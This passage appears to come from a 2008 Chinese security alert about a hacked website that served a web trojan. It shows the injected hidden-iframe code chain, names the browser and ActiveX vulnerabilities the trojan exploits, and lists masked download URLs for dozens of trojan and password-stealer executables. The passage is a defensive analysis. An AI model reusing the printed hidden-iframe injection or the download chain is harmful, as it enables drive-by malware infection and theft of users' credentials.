植入病毒,用户如果访问该网站,系统就会自动从恶意网站上下载并运行恶意程序。
被感染病毒的用户系统可能被远程控制,盗取用户敏感信息。甚至导致死机。
该网站问题代码:
<IMG src="http://www.janmeng.com/attachments/2008/03/1_200803120945071.jpg" border=0>
<script language="JavaScript" src="common/top.js"></script>
Top.js文件的作用就是打开top_ad.htm页面
http://www.p****.com/ad/top_ad.htm问题框架代码:
<IMG height=345 src="http://www.antiy.com/security/alarm/img/20080311b.jpg" width=480 border=0>
<iframe src=http://date03.16272.net/q2.html?id=td width=0
height=0></iframe>
http://date03.1****.net/q2.html?id=td 被插入框架代码:
<IMG height=344 src="http://www.antiy.com/security/alarm/img/20080311c.jpg" width=481 border=0>
<iframe src="news.html" width=100 height=0></iframe>
http://date03.1****.net/news.html 网马代码:
<IMG height=345 src="http://www.antiy.com/security/alarm/img/20080311d.jpg" width=481 border=0>
解密网马后可知该网马利用以下漏洞来传播:
MS06014漏洞 (clsid:BD96C556-65A3-11D0-983A-00C04FC29E36)
联众世界游戏大厅所安装的GLCHAT.GLChatCtrl.1 ActiveX控件漏洞
暴风影音播放器MPS.StormPlayer漏洞
REALPLAY播放器IERPCtl.IERPCtl.1漏洞
迅雷ActiveX控件DownURL2方式远程缓冲区溢出漏洞
百度搜霸漏洞
当用户访问http://www.pp365.com/时,系统会自动下载以下病毒文件:
http://dd1.1a*****.com/down/01.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/02.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/3.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/4.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/5.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/6.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/7.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/8.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/9.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/10.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/11.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/12.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/13.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/14.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/15.exe
病毒名:(Trojan-PSW.Win32.Lmir.bpv)
http://dd1.1a*****.com/down/16.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a*****.com/down/17.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a*****.com/down/18.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a*****.com/down/19.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a*****.com/down/20.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a*****.com/down/21.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a*****.com/down/22.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a*****.com/down/23.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a*****.com/down/24.exe
病毒名:(Trojan.Win32.Popwin.awj)
http://dd1.1a*****.com/down/25.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/26.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/27.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/28.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/29.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a*****.com/down/30.exe
病毒名:(Trojan-PSW.Win32.OnLineGame.rdx)
http://dd1.1a*****.com/down/31.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a*****.com/down/32.exe
病毒名:(Trojan.Win32.Agent.diq)
http://dd1.1a*****.com/down/33.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/34.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/35.exe
病毒名:(Trojan.Win32.Pakes.bzp)
http://dd1.1a*****.com/down/36.exe
病毒名:(Trojan.Win32.Pakes.bzp)
以上病毒文件为蠕虫和游戏盗号木马,自动运行后将会,盗取用户敏感信息,
甚至导致死机。由于下载数量太多,这里不一一分析。